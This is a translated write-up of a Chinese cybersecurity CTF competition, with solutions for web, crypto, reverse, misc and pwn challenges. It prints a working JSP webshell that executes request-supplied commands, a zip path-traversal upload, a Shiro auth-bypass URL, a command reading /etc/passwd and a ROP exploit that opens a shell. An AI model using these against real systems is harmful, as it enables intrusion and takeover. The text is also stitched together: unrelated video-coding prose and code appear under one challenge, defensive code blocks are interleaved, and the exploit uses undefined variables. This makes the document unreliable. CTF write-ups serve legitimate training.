Henan Province 3rd Jindun Xin'an Cup Cybersecurity Competition (河南省第三届金盾信安杯网络安全大赛)

WeChat official account: Th0r安全

Table of contents

  • Henan Province 3rd Jindun Xin'an Cup Cybersecurity Competition
  • Web
    • Upload your zip archive
    • Don't even think about brute-forcing me
  • Crypto
    • Hi There
    • Bass guitar tab
    • Unfinished promotional image
  • Reverse
    • Re2
    • Re3
    • Re5
  • Misc
    • Messy notes
    • This is the key information
    • hello-world
  • Pwn
    • pwn2

Web

Upload your zip archive

After uploading, the zip gets extracted, so upload a JSP webshell packed in a zip:

<%
if ("feng".equals(request.getParameter("pwd"))) {
    java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int len = -1;
    byte[] bytes = new byte[4092];
    out.print("<pre>");
    while ((len = input.read(bytes)) != -1) {
        out.println(new String(bytes, "GBK"));
    }
    out.print("</pre>");
}
%>

Visiting it afterwards gives an error; presumably the upload directory does not allow execution. Try a zip path traversal, editing the archive in 010 Editor:
Upload it again, visit 1.jsp for RCE, then read flag.jsp.
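The traversal works because the server writes each archive entry under the upload directory using the entry name as-is. As an added example (not code from the challenge or this write-up), the Python below shows the check a server should do instead: every entry is resolved against the destination before anything is written, entries that escape it are rejected, and file types are restricted by an assumed allowlist. The archive is constructed inline; its "../1.jsp" entry holds placeholder text, not a shell.

```python
import io
import os
import tempfile
import zipfile

# Constructed sample: one harmless file plus an entry whose name climbs out of
# the extraction directory (the kind of entry the write-up edits into its zip).
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("notes/readme.txt", "harmless content\n")
    _zf.writestr("../1.jsp", "<%-- placeholder text, not a real shell --%>\n")
SAMPLE_ZIP = _buf.getvalue()

ALLOWED_EXTENSIONS = {".txt", ".png", ".jpg"}  # assumed upload policy for this example


class UnsafeEntry(ValueError):
    """Raised when an entry would escape dest or carries a forbidden file type."""


def resolved_target(dest, name):
    """Map an entry name to an absolute path and refuse anything outside dest."""
    dest = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest, name))
    if os.path.commonpath([dest, target]) != dest:
        raise UnsafeEntry(f"path traversal: {name!r}")
    return target


def safe_extract(zip_bytes, dest):
    """Validate every entry first, then extract; returns the names written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        # First pass: validate all entries so a bad one cannot land after good ones.
        for info in zf.infolist():
            name = info.filename
            if os.path.isabs(name) or name.startswith(("/", "\\")):
                raise UnsafeEntry(f"absolute path: {name!r}")
            resolved_target(dest, name)
            if not info.is_dir():
                ext = os.path.splitext(name)[1].lower()
                if ext not in ALLOWED_EXTENSIONS:
                    raise UnsafeEntry(f"forbidden file type: {name!r}")
        # Second pass: write through our own path mapping, never extractall() on untrusted input.
        for info in zf.infolist():
            target = resolved_target(dest, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def check_sample():
    """Run the traversal archive and a clean one; returns (rejection_reason, accepted_names)."""
    dest = tempfile.mkdtemp()
    try:
        safe_extract(SAMPLE_ZIP, dest)
        rejected = None
    except UnsafeEntry as e:
        rejected = str(e)
    clean = io.BytesIO()
    with zipfile.ZipFile(clean, "w") as zf:
        zf.writestr("notes/readme.txt", "harmless content\n")
    accepted = safe_extract(clean.getvalue(), dest)
    return rejected, accepted


if __name__ == "__main__":
    print(check_sample())
```

Validating all entries before writing any is deliberate: rejecting the archive as a whole avoids leaving a half-extracted upload behind when the bad entry is not the first one.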

Don't even think about brute-forcing me

Same challenge as the Huxiang Cup: download the heapdump and the rest is identical to the Huxiang Cup solution. Link:
https://blog.csdn.net/meteox/article/details/121334507
A pom.xml is provided, Shiro version 1.50. Directory scanning finds /actuator, but requesting the files under it redirects to login; combined with the Shiro authentication bypass it can be reached:
http://f027f9e4.lxctf.net//;/actuator/env
The heapdump file can then be downloaded; extracting the key from it follows this article: https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.htm . Once the key bytes are found, restore the key:

import base64
import struct

# The 16 signed bytes recovered from the heapdump, packed back into raw bytes
# and base64-encoded to get the Shiro rememberMe key
key = base64.b64encode(struct.pack('<16b', 25, 56, -57, 73, 111, 12, -81, 57, 36, 114, 15, 13, 84, -56, -96, -89))
print(key)

Then just run the tool against it.
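The "//;/actuator/env" URL gets through because the servlet container drops ";" path parameters and empty segments before mapping the request, while the authorization filter matched the raw URI. As an added example, not from this write-up, the Python below normalizes request paths the way the container does and flags access-log lines where a sensitive endpoint (assumed here to be anything under /actuator) was reached through such syntax with a 200 response. The log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the challenge host).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Nov/2021:10:00:01 +0800] "GET /login HTTP/1.1" 200 512
10.0.0.5 - - [25/Nov/2021:10:00:02 +0800] "GET /actuator/env HTTP/1.1" 302 0
10.0.0.9 - - [25/Nov/2021:10:00:03 +0800] "GET //;/actuator/env HTTP/1.1" 200 18044
10.0.0.9 - - [25/Nov/2021:10:00:04 +0800] "GET /static/..;/actuator/heapdump HTTP/1.1" 200 93121
10.0.0.7 - - [25/Nov/2021:10:00:05 +0800] "GET /api/items;jsessionid=abc HTTP/1.1" 200 77
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SENSITIVE_PREFIXES = ("/actuator",)  # assumed: endpoints that must not be reachable unauthenticated


def normalize_path(raw):
    """Normalize like the container: drop ;params per segment, collapse //, resolve . and .."""
    path = unquote(raw.split("?", 1)[0])
    parts = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]      # path parameters are stripped segment by segment
        if seg in ("", "."):
            continue                    # empty segments from '//' and '.' are no-ops
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)


def analyze_line(line):
    """Return a dict describing the request, or None if the line does not parse."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw = m.group("path")
    norm = normalize_path(raw)
    # Syntax that differs between the raw URI (what the filter saw) and the mapped path
    bypass_syntax = ";" in raw or "//" in raw
    sensitive = norm.startswith(SENSITIVE_PREFIXES)
    return {
        "raw": raw,
        "normalized": norm,
        "status": int(m.group("status")),
        "sensitive": sensitive,
        "suspicious": sensitive and bypass_syntax,
    }


def find_bypass_attempts(log_text):
    """Raw paths of requests that reached a sensitive endpoint via bypass syntax and got a 200."""
    hits = []
    for line in log_text.splitlines():
        info = analyze_line(line)
        if info and info["suspicious"] and info["status"] == 200:
            hits.append(info["raw"])
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print("bypass-style access:", hit, "->", normalize_path(hit))
```

The direct "/actuator/env" request that was redirected to login is reported as sensitive but not suspicious; the two requests that used ";" or "..;" segments and still received a 200 are the ones a defender wants to see.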

Crypto

Hi There

Ciphertext: Hhbe1cie93bfTFbcc2hl94e2ea1c91rgab5fei3432Tse498
Rail fence; by testing, the parameter is 8.

Decrypts to: HiThereTheFlagisb9b91a3ee3c4cb441bce9539cf221f28
flag{b9b91a3ee3c4cb441bce9539cf221f28}
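The "rail fence" these online tools implement is a grouped column transposition: the text is split into groups of k characters and read column by column, so decrypting is the same operation with k' = n / k. As an added example (not from this write-up), here is that transform in Python, run over the challenge ciphertext, with a loop over every group size dividing the length, which automates the "test until it works" step; the marker "HiThere" picks the right reading.

```python
CIPHERTEXT = "Hhbe1cie93bfTFbcc2hl94e2ea1c91rgab5fei3432Tse498"  # from the challenge


def rail_encrypt(text, k):
    """Split text into groups of k, then emit column 0 of every group, then column 1, ..."""
    if len(text) % k:
        raise ValueError("group size must divide the text length")
    groups = [text[i:i + k] for i in range(0, len(text), k)]
    return "".join(g[c] for c in range(k) for g in groups)


def rail_decrypt(cipher, k):
    """Inverse of rail_encrypt: character c of group g was written to cipher[c*n + g]."""
    if len(cipher) % k:
        raise ValueError("group size must divide the text length")
    n = len(cipher) // k
    return "".join(cipher[c * n + g] for g in range(n) for c in range(k))


def candidates(cipher):
    """Every divisor of the length gives one reading; return {k: plaintext} for all of them."""
    n = len(cipher)
    return {k: rail_decrypt(cipher, k) for k in range(2, n) if n % k == 0}


def solve(cipher, marker="HiThere"):
    """Pick the group size whose decryption starts with the expected marker."""
    for k, pt in candidates(cipher).items():
        if pt.startswith(marker):
            return k, pt
    return None


if __name__ == "__main__":
    for k, pt in candidates(CIPHERTEXT).items():
        print(k, pt)
    print(solve(CIPHERTEXT))
```

Because encryption and decryption are the same transform, rail_encrypt(CIPHERTEXT, 6) also yields the plaintext: 48 characters in groups of 8 means 6 rails, and the tool's "8" is the group size.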

Bass guitar tab

Ciphertext received:

KIYVK6KWIVWE6V3MLJEVEVCOKVKDANKLKVKWIYKRNNJE4VKWOBMFGVLLPFLEK5CPKNWFMSC
WKRHEKUZQGFBVM23IIZLWYUSEKRVUUWCSGFDGCVSFORHFK3DEJJJVISSFKJKTCYKVNNSFMTJRKJ
GFIVTQK5JVKVLZKZCTCT2VNRFEQV3LJJCVIMBVINLFK3CKJVVVMSSUKZYFGURRKV5FERLUJZJWYZC[…]ZC[…]VET
SVKZFFQURQGB4VERLUJ5KWY3CIKVKFERKTKZFEWVTLMRLE222SKRKFM4CXKIYVK6KWIVWE6V3
MLJEFOVCOIVJTANKTKZVWIYKRGFJFAVCVJJMFGVKVPFLEKMKPKFWGISCXKRJEKURQGVBVMMDEJ
JLWYUSGKRVUUWCSGAYHUUSFORHVG3DEJJKVITSGKJKTCYKXKVSFMTLLKJHFIMDQKVJDARL2KZD
EMT2TNRDEQVCWOBKVGMBVKNLFK3C2JUYFERCUKZYFGURRKZQVERLMJ5IWYZCIKZKEUVKUKU2
UGVJQMRJE4RSSJRKDA4CXKJ5FC6KWIUYU6VLMNREFMVCOIVKFMRTBKZCWIUSNGFJFIVDMJJLFE
MLQIRLEKOKOKFWGISSUKRFFKU2VGVBVORLELJHEKUSOKVLHAWCSGAYHSVSFGFHVO3CGJBLVIUS
FKNKTSS2WIVSEETLLKZCFI23QKRJDCVTBKZCTCUSTNRLEUVSUJJKVIVJVJNLGWZCSK5WFESSUNRFF
OURQKV5FERKOJ5JWY2CIKVKE4RKTKZDFGVTLMRNE23CSJZKGYTSFKIYXARCSIUYU4VLMMRFFKVC
KKVKTANKUKJKWIVSOIZJFAVKVOBLVEMDLPFJEKVSPKNWFMSCUKZWFKU2VGFJVMMDIIZGWYUSQ
KRWE4RSSPJITAUSFMRHFG3CWJJJVM4CVKFKTKRCSNNSFMTJQKJHFI23QLBJVKVTBKZDEMT2XNR
HEQVSUJJKVGVJVMFLDA3COJUYFEUSUNNYFKURRKUYFERLMKNJWYWSIKVKEURSTGA2UWVTLMR
NE222SJJKFK4CWKNLFMYKWIVDE4V3MIZEFIVCSIVKFKMLBKZVWQQSXNRJEYVDLOBNFEMKWMFL
EKMKTKNWFESCWKRFEMU2VGVFVK23EMFIWWUSQKQYEUV2TIVCXSVSGIZHU222KJBKFISSVKIYD
SQ2WNNSEUV3MKJCFI22KKRJDC4CDKZCWYUSVNRLEQVKUJJCVCMBVMFLWWZCWJZDFETSVNNY
FQU2FIV5FMRLEJ5KWYUSIK5VU4VKUKU2UGVSVNBBE23CWIRKGUSSDKIYDAMCWIUYVGVLMLJEF
MVCOIZJDANKUKEYGITSNGFJE4VCVOBLVEMBQPJJEMRSPKNWGISCWKZYFKU2VGVBVMMDEKJLW
YUSOKRWEUU2SPJLEEVSFMRIFG3C2JBJFISSWKEYDKS2WIVSFOUKWKJDFKVSKLBJDC232KJKWYT2
RGBFEQVSUKJCVGMBVKNLGWYZQJUYVESCUKZYGCURRKZQVMRLMJ5IWYZCJKFKE4VKUKU2UWVJ
QMRQVCVSSJJKVK4CXKIYEK6KWIVHE6ULMKZEFMVTQIVJVKNKLKYYGIUSNNRJE4VDMOBJFEMKFP
FLEKMKPKFWFUSCVKRHEKVKVGVFVK23EKZGWYUSKKRWHAV2TIVKXUVSGJZHVG3DEJBHFKRSVK
MYUMS2WGBWEUTLMKJKFI22KLJJDAMDZKZCWYUCRNRSEQVCUJZDFEMBVKNLEKZCOJUYVETCU
GBYFOUT2KF5FMRLMJ5LWY2CIKZKFEVKUKZFEWVTLMRNE2MKSJZKGW4CUKIYVK6KWIVSFAU3M
LJEFOVCKKVJVKMLBKVVWIUSNNRJFAVBQOBLFGVTLPFLEKMKPKFWEUSCOIRFEKUZQGVFVMMDM
JZGWYVSEKRWE4RCSGFKTAVSFORHVC3DEJFIVISSFKMYDKU2WNNSE4V2WKJFFK23QLBJVK23ZKZ
CXIT2TNRNEQVCWNRKVGVSKJNLDAZCGJVVVETCUNNFFOURROBBVERLUJZKWYVSIKVLHAVKVKUY
WCVSFMRLE23CSJBKFM4CZKJ5FC6SSKUYU6VLMLJEFMVCOIVKFKOKDKZVWIRSNNRLEIVDLJJMVE
MLMMFLEKOKPKFWFUSCTKRHEMU2VGVBVO23EJZLVMUSMKVKXAVSSGFKXUUSFMRHFO3C2JBL
FM3CVKRLEUS2WGBRTATJRKJDFI22OI5JHUVSCKZCWITSTNRNEQVCUJJDFCMBVKRJEKYZQK5KVES
CUKVYFOU2VKV4VERLUJ5LWYRSIKZKE4RKTKZFEGVSFMRDE2MCWIZKGY4CWKIYVK6KWIVWE6U3
MKZFFMVCOIVKVKNKLKZVWIYKRNNJEUVDMJJMFEMCVPFLEKTSPKUYE4SCXNNFFKU2WIZQVM23
ELJGWWUSMKRLHAU2SGFVXUVSFGFHFK3CWJBHEM4CVKUYDKQ2WKVSFMV3MKJHFK23QK5JDC
VTBKZCVMT2TNRLEQTSVIZKVGMKGJNLFK3CKJVVVMTCUKZYFEURQGAYFMRLUJ5KWYVSJKJKEUVK
UKU2UGVJQMRJE222SJZKFK4CWKIYVK6KSIUYU6VJQKJEFMVTMKVJDAMKLKZKWIWSNGFJEUVDM
JJLVEMKVPJLEKMKQKFWFMSSWKRFFKUKVGVFVM23EKZLWWUSKKVWEUV2TKVKXUUSVNRHVG3
COJBLVITSFKRKTCS2WKVSFMTJQKJEFIVSOIRJDCVL2KJCWITSRNRJEQUSUJJKVCVJVIRITAZCWJVVVE
TCUNRFFOURQKV4VEVKOJ5IWYUSIJZCEURKTKZDEWVTLMRFE222SKBKGWSSXKIYDCYKWIUYU6VL
MKZEVCVCKKVKFKNKUKJCWIVSNNRJEUVDLJJMFGVLLPJJFKTSPKVWFMSCWKRHFKUZRIZFVM23MI
ZGTAUSEKRVXAWCSGFLFUVSFHFIFC3C2JBIVITSGKNKTKS2VNNRTATSGKJGFKVLQK5JDCVTBKZCU4T[…]SX
NRHEQVCUJJKVIMBVMFLGWZCSJUYFMSSUNNHEMURQGFQVERLUJ5IWYWSIJZDHAVKTGA2VGVT
LMRLE2MCSJRKGW4CZKJ5FC6SSKVLE6UJQLJEFMVCOIVKDAMKDKZVWIRSNNRLEIVDLOBKVEMK2I
JLEKVSSKVWGISCWKRFFKVBQGVBVMMDELJLVMUSMKVKXAVKSGBCXSUSFGFHVK3C2JBLFISSVKQ
YUMS2WKVSFUTLMKJIFI22OI5JDC4CDKZCWYT2VNRNEQUSUJJKVCMBVKRIWWZCOJZDFETSUKVY
FOURQIZQVMRKGJ5LWYRSIKZKE4VKUKUYWCVRQNRJFO3CSJJKGYTSEKIYVK6KWIVWE6V3MKZFFK
VCOKVKVKNKEKEYGGMKRKZJEQVCVOBLVE6SRPFLEMRSPKUYEUSCVNNDFKU2VHFBVM23EIZLWY
USGKRVXAVCSGAYVUVSFORJFG3CWJBLFITSVKIYDCVCRGBSFMV3LKJIFIMDQK5JVKVL2KJCXIT2VNR
HEQVCWOBCVIMBRINLFK3C2JUYFERCUKZYFEURQGFNFMRJZJ5LWYWSIK5KE4RSSGA2UGVJQMRJ
E4RSSJZKFK4CZKNKVK6KSKV2E6V3MJJEFMVCOIVKDCRSLKZCWIRSNGFJEYVDMJJKFE6SWIJLEK5CS
KNWFUSSSKRFFKUSVGVFVMVLEKZLWWUSOKVKXAWCSGFVXSUSFORHVK3CSJBLWWSSVKNLEUU
2WKVSFMV3MKJKFI22KKNJDCVJQKZCTSUSTNRSEQVCUJZKVIMBVIRIWWZCSJZCVETSVKZFFKU2WI
U4VAVBQHFIFIMB5

Decode in the following order: base32, base64, base32, base16, base64. The result is:

Pf0>IdQ5OcQBF@uY&UjKJ3UPyO<p@xZ%s}pHFHiqIA>W;J3UZ)Pf2Vsbx%7bM=DQ6a6v*)XHZjMPe
&~yaZfENPI^yBPB?Z?J9R`pPe@K|bWb~Tds<FyKs|O*Lo;+cPf2W6d`@X2B{ooIYj18-GC4z9Pf2TddQ
V7rcr8#wC@O1Ab7UiOPiaJXSW;R(VmnW0QFCKYJ7Rq%Pf2SbZBkbzYfMgUKx`#YXGVQ3PHjLTDNR
pEMp#cqeo|LZV|{K^Pe@HZVNzjGKw3_1Kq+%iNkM%*PHkR6BTqXdHEB>qN@HwOdND~qPf0>IU
r|FdR&z~1dR1mmJ0xIuPHQD=K~W}lD{M|_d_+i7H8@#4Pc3CCZ%s}<J9tiQKp}8bH9JQ#PCYkqP)9~ XMKVuCa8pQ7XHZsnPf259Em1;VS8Gs3ba-x1XL(~;PCrU5DMv+mW=2p$U~^$pHG5B9Pe^zzcTXxo
azRi<N-1?uNkTCyPHaeaV^2vzeLheqZa#BQJ3UP!PiaJUYfnf&c4AOPbZlu+CUz?+PiaIsS5G@7M<q~ WJ~LBLW_>|GPe(02bxlrwGg?hRY;i(UH7zk?Pe&~~bWUk=H8oF2O@4DuZDu8PPf2W6d`~GrW;akp
buoEOUOQ29P-RVda8D{SdQMMhA$D?7S|(yXPdg-Fb5dG9Bx+7=R&ZudJU3Y-PCaRAZBIKTM`loCJu
6O6J7OU!PChAeCQmyhM=DNfd_hG>WMO)5P$+IDa7|ueP9#ufYiT1>d2eMhPChAeDp5E`XjM=}N
@i?OXIMRSPdijZU{6I(P+w0;K_PHYJ7Rr4Pf0>IdQ5V0NpDR+LrhptJ3UP!PCaQVW=&2gHFHiqIA>W;J
3UZ)Pf2W9CQ&0pQ#npNc6Mn^UL$5ZPe&~yaZgA^S1V6QPB?Z?JVrn$Pc1+=V^2GCdudK>G&^ojN
kMpVPHk3jW=no6YE4c|G%8O@c70$y


One more pass with an all-in-one base decoder gives the flag: 380a4d5bea49d6a00921d4ed26b9d4ab
flag: flag{380a4d5bea49d6a00921d4ed26b9d4ab}
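The named layers can be peeled automatically by testing each candidate alphabet, most restrictive first, and accepting a decode only when it yields printable text. As an added example (not the write-up's tool), the Python below does that; it is tested on a sample built inline by wrapping the flag in the same five layers in the same order. base85 is included as a candidate on the assumption that an all-in-one tool would try it too, but the page does not say which encoding its final pass removed, so the constructed sample does not include that layer.

```python
import base64
import re

# Candidates in order of most restrictive alphabet first, so a hex string is not
# mistaken for base32 or base64 (both of whose alphabets contain the hex digits).
LAYERS = [
    ("base16", re.compile(r"[0-9A-F]+"), base64.b16decode),
    ("base32", re.compile(r"[A-Z2-7]+=*"), base64.b32decode),
    ("base64", re.compile(r"[A-Za-z0-9+/]+={0,2}"), base64.b64decode),
    ("base85", re.compile(r"[0-9A-Za-z!#$%&()*+\-;<=>?@^_`{|}~]+"), base64.b85decode),  # assumed extra layer
]


def peel_once(text):
    """Try each decoder in order; return (layer_name, decoded_text) or None."""
    for name, alphabet, decoder in LAYERS:
        if not alphabet.fullmatch(text):
            continue
        try:
            decoded = decoder(text.encode("ascii")).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        # Every intermediate layer is itself text; binary output means a wrong guess.
        if decoded and decoded.isprintable():
            return name, decoded
    return None


def peel(text, stop=lambda s: s.startswith("flag{"), max_layers=10):
    """Strip layers until the stop predicate holds; return (layer_names, final_text)."""
    layers = []
    current = "".join(text.split())  # pasted blobs carry line breaks
    for _ in range(max_layers):
        if stop(current):
            break
        step = peel_once(current)
        if step is None:
            break
        name, current = step
        layers.append(name)
    return layers, current


def build_sample(flag):
    """Constructed sample: wrap flag in the challenge's five layers, innermost first."""
    data = flag.encode()
    for enc in (base64.b64encode, base64.b16encode, base64.b32encode,
                base64.b64encode, base64.b32encode):
        data = enc(data)
    return data.decode()


if __name__ == "__main__":
    sample = build_sample("flag{380a4d5bea49d6a00921d4ed26b9d4ab}")
    print(peel(sample))
```

Run on the constructed sample, peel() reports the layers in the order the write-up lists them (base32, base64, base32, base16, base64) and stops at the flag.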

Unfinished promotional image

Opening the file 20211125.tmp, it consists entirely of coordinates.
This matches the hint: the designer has left and is handing over the unfinished work, whose requirements are: 1. the promotional image must be redone as a vector image; 2. add a QR code with contact details.
Use a matplotlib plotting script: reformat the file and save it as a txt file.

Script:

import matplotlib.pyplot as plt
import numpy as np

# Each line of the txt file is "x,y"; plotting every point as a dot reveals the QR code
x, y = np.loadtxt('C:/Users/lenovo/Desktop/1.txt', delimiter=',', unpack=True)
plt.plot(x, y, '.')
plt.show()

The result is a QR code

Scan it with WeChat to get the flag
flag{1e52c4c05dcff5fcc54b64e21bcbdc9e}

Reverse

Re2

  1. Look at the main function
    First find the logic

    This call is abnormal; looking at it, it is a function that takes main as its argument
    This stretch is also suspicious; inspecting it, it roughly runs the function before main and then performs a series of operations (RC4, XOR, a base variant)
  2. Run the program: there is a time prompt, but it is a fake time, really....
  3. Brute-force script
#include <stdio.h>
#include <stdlib.h>

/* Brute-force the srand() seed over a timestamp range until the first rand() matches the observed value */
int main() {
    for (int i = 1609448160; i < 1671742560; ++i) {
        int seed = i;
        srand(seed);
        if (rand() == 1515432825) {
            printf("%d\n", seed);
            break;
        }
    }
    return 0;
}
  4. Brute-force the seed value, then set eax directly to the seed value, pick the decryption location and create a decryption function
for (i = 0; i <= 41; ++i) {
    a3 = *(&key1ptr + i) ^ *(i + a1);
    if (a3 != *(&key2ptr + i))
        break;
}
result = i;
v5 = __readfsqword(0x28u);
v4 = v5 ^ v91;
if (v5 != v91)
    result = (unk_559E)(a1, a2, a3, v4);
return result;
}

The created function is omitted (too many variables were created; only the final key part is kept). Decrypting in forward order is a bit troublesome because of the random XOR (fine, I'm just not good enough). Extract key1 and key2 from above and XOR them; the flag comes out directly.

# key1 as pasted holds 84 values; only the first len(key2) = 42 are used below
key1 = [61, 159, 9, 29, 146, 126, 169, 130, 106, 19, 233, 31, 142, 51, 80, 143, 113, 7, 29, 251, 28, 209, 237, 15, 152, 82, 22, 39, 215, 245, 155, 56, 89, 220, 239, 87, 82, 180, 252, 235, 117, 11, 91, 243, 104, 122, 233, 77, 203, 225, 93, 39, 217, 126, 187, 30, 103, 187, 21, 62, 48, 207, 126, 225, 136, 34, 249, 102, 115, 23, 250, 150, 250, 94, 111, 236, 214, 53, 101, 215, 205, 136, 69, 118]
key2 = [91, 243, 104, 122, 233, 77, 203, 225, 93, 39, 217, 126, 187, 30, 103, 187, 21, 62, 48, 207, 126, 225, 136, 34, 249, 102, 115, 23, 250, 150, 250, 94, 111, 236, 214, 53, 101, 215, 205, 136, 69, 118]
flag = ''
for i, _ in enumerate(key2):
    flag += chr(key1[i] ^ key2[i])
print(flag, end='')

Re3

Reused challenge; reference link: https://blog.csdn.net/dyllove98/article/details/9018453
Instructions in the SSE4.1 instruction set and their use in video coding. Integer format conversion, for example converting an 8-bit byte variable into a 16-bit word variable or a 32-bit doubleword variable, is common in image and speech signal processing. For example, image data are 8-bit byte variables; if the fixed-point representation of the floating-point values in the computation uses the Q15 format, the 8-bit unsigned values must be extended to 16 bits to suit SIMD parallel computation; if higher precision is needed, Q15 is clearly too low and Q24 is a good choice, in which case the 8-bit unsigned values must be extended to 32-bit doubleword variables for SIMD parallel computation.
SSE4.1 provides 12 different instructions for converting between the various integer formats. Motion estimation takes more than 30% of video encoding time, and SSE SIMD instructions can effectively accelerate the motion estimation computation.

#include <limits.h>
#include <stdlib.h>

/* Exhaustive 4x4 block matching: find the position in refFrame whose block has the
   smallest sum of absolute differences (SAD) against curBlock; writes (x, y) to matchBlock */
int blockMatch4x4(const unsigned char* refFrame, int stepBytesRF,
                  const unsigned char* curBlock, int stepBytesCB,
                  int* matchBlock,
                  int frameWidth, int frameHeight)
{
    int lowSum = INT_MAX;
    int i, j, k, l;
    int temSum = 0;
    int blockHeight = 4;
    int blockWidth = 4;
    const unsigned char *pRef, *pCur;

    for (i = 0; i <= frameHeight - blockHeight; i++)
    {
        for (j = 0; j <= frameWidth - blockWidth; j++)
        {
            temSum = 0;
            pCur = curBlock;
            pRef = refFrame + i * stepBytesRF + j;

            for (k = 0; k < 4; k++)
            {
                for (l = 0; l < 4; l++)
                {
                    temSum += labs(*pRef - *pCur);
                    pCur++;
                    pRef++;
                }
                pCur += stepBytesCB - 4;
                pRef += stepBytesRF - 4;
            }

            if (temSum < lowSum)
            {
                lowSum = temSum;
                *matchBlock = j;
                *(matchBlock + 1) = i;
            }
        }
    }
    return 0;
}
# The 38 bytes compared in the binary; XOR each with 127 to recover the flag
a = [
0x19, 0x13, 0x1E, 0x18, 0x04, 0x31, 0x14, 0x26, 0x4F, 0x32,
0x2B, 0x32, 0x4B, 0x31, 0x2B, 0x36, 0x4E, 0x32, 0x14, 0x36,
0x06, 0x32, 0x2A, 0x2D, 0x3B, 0x2D, 0x15, 0x2E, 0x4E, 0x30,
0x3A, 0x26, 0x4A, 0x30, 0x3A, 0x2E, 0x4F, 0x2]
for j in range(len(a)):
    print(chr(127 ^ a[j]), end='')

flag{NkY0MTM4NTI1MkIyMURDRjQ1OEY5OEQ0}

Re5

re6
Got the attachment; ran it first, no output. Checked for a packer in a tool: 32-bit, unpacked.


No obvious core code in the main function, but it has an input function; stepped in and debugged it, and after a while confirmed the input is indeed not in main, so look for the other input function.
Another input function can be seen here; trying it again, it is just an XOR that recovers its string; just write the script.



Script:

# 38-character string from the binary, XORed byte by byte with the key table d
e = 'Vm0weGQxSXhiRmhUV0doV1YwZDRWRmxVUW5KWl'
d = [0x30, 0x01, 0x51, 0x10, 0x1E, 0x1E, 0x05, 0x32, 0x04, 0x16, 0x3D, 0x50, 0x20, 0x09,
     0x5B, 0x39, 0x0E, 0x52, 0x33, 0x07, 0x24, 0x68, 0x35, 0x25, 0x29, 0x0A, 0x04, 0x06,
     0x2B, 0x09, 0x30, 0x18, 0x00, 0x1A, 0x63, 0x3B, 0x10, 0x11]
for i in range(len(e)):
    print(chr(ord(e[i]) ^ d[i]), end="")

Misc

Messy notes

An image covered by a QR code. Ran a script on it: wrong. Noticed that the command at the top can be guessed:
/usr/bin/head -n 1 /etc/passwd | /usr/bin/awk -F: '{printf $1}' | /usr/bin/
These are Linux commands; passwd suggests a password, so guess the encoding is MD5. On Linux the highest-privileged account is root by default, so MD5 "root": the result matches the image exactly.
flag{63a9f0ea7bb98050796b649e85481845}

This is the key information

From the given hint, qingtengwglab@ctf.com, OSINT on GitHub turns up something it published. Link: https://github.com/p1n93r/qingteng-wblab/blob/0490a4b62339020331624c22e3e5fc6a1ca3e8c4/qingteng-wglab/README.md
There is an explanation there, but it is confusing.
Not it. Looking further back, there is a gif image logo.gif and a README.md; opening the image in Notepad reveals the flag: flag{0b6db90034ac4494956679a100e236fc}

hello-world

Hex encoding found in the image's properties
Ciphertext:

666c61677b35383561626436653435316134623466393665636630343036303136376264397d

Hex-decode to get
flag: flag{585abd6e451a4b4f96ecf04060167bd9}

Pwn

pwn2


After checksec, straight into gdb
There is a stack overflow
Exp:

from pwn import *

context(arch='amd64', log_level='debug')
elf = ELF('./babystack')
p = process('./babystack')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_plt = elf.plt['read']
pop_rdi = 0x0000000000400813
leve_ret = 0x0000000000400701  # leave ; ret
ret = 0x000000000040053e
main = 0x400677
pop_rsi = 0x0000000000400811  # pop rsi ; pop r15 ; ret
p.recvuntil('name\n')
final = 0x00609000 - 0x200
final2 = final + 0x100
payload = b'a' * (5 + 8) + p64(final) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) \
    + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(final) + p64(0) + p64(read_plt) + p64(leve_ret)
payload = payload.ljust(109, b'b')
p.send(payload)
p.recvline()
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8, b'\x00'))
log.info(hex(puts_addr))
libc_base = puts_addr - 0x80aa0
gadget = libc_base + 0x4f3d5
system = libc_base + 0x4f550
bin_sh = libc_base + 0x1b3e1a
# final1 and buf2 are used below but never defined in the script as posted
payload2 = p64(final1) + p64(pop_rdi) + p64(bin_sh) + p64(ret) + p64(system) + p64(read_plt) \
    + p64(final1) + p64(0) + p64(buf2) + p64(100)
p.sendline(payload2)
p.interactive()
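The chain above can hardcode gadget and GOT addresses only because the binary is not position-independent, which is what the checksec step at the top of this section establishes. As an added example (not part of the write-up), the Python below reads the part of that output an auditor of a build can get from the ELF headers alone: NX from PT_GNU_STACK, PIE from e_type and RELRO from PT_GNU_RELRO. The two ELF images are constructed inline as header-only files with no code; stack canaries need the symbol table and are not covered here.

```python
import struct

PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC, ET_DYN = 2, 3


def parse_elf64(data):
    """Return (e_type, [(p_type, p_flags), ...]) from a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from("<HHIQQQIHHH", data, 16)
    phdrs = []
    for i in range(e_phnum):
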